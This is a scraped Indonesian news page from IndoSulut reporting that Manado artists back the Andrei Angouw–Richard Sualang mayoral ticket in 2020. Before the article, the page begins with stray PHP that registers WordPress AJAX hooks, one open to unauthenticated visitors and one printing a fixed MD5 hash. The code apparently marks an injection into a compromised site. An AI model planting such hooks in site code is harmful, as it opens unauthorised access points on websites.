function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Senior dan Tokoh Seniman Manado Dukung AARS – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 27 Okt 2020 20:50 WIB ·

Senior dan Tokoh Seniman Manado Dukung AARS


					Senior dan Tokoh Seniman Manado Dukung AARS Perbesar

Manado,IndoSulut – Arus dukungan bagi pasangan calon Walikota dan Wakil Walikota Manado, Andrei Angouw-Richard Sualang (AA-RS) terus mengalir.

Senin (26/10), AA-RS bertemu dengan Komunitas seniman/pelukis dan perupa yang dikoordinir Denny Katili, Jaya Masloman, Alfein Gilingan, Jimmy Manus.

AA-RS pun terlibat dialog sambil mendengarkan ide-ide kreatif pekerja seni untuk memajukan Manado yang lebih baik dan sejahtera.

“Kami berkomitmen mewujudkan keinginan-keinginan pekerja seni supaya ada galeri seni untuk Kota Manado dan mensuport para pekerja seni dalam keikutsertaan pada kegiatan-kegiatan nasional maupun internasional,” ucap pasangan calon nomor urut 1 ini.

Dalam kebersamaan itu, terbentuklah komitmen dari para pekerja seni untuk menjadi penggerak untuk kemenangan AA-RS pada Pilwako 9 Desember nanti.

“Kami sepakat mendukung Andrei Angouw-Richard Sualang untuk menjadi Walikota dan Wakil Walikota Manado,” tutur Alfeyn Gilingan.

Richard Sualang menyampaikan terima kasih untuk dukungan ini, bersama AA-RS Ketua Pria Kaum Bapa GMIM El Manibang Malalayang itu berjanji jika direstui Tuhan menjadi pemimpin di kota Manado, para pekerja seni akan dia berikan perhatian khusus, karena memang komunitas ini akan banyak diperlukan pemerintah untuk bermitra dalam menjalankan pemerintahan di Kota Manado yang lebih baik lagi.

Artikel ini telah dibaca 6 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized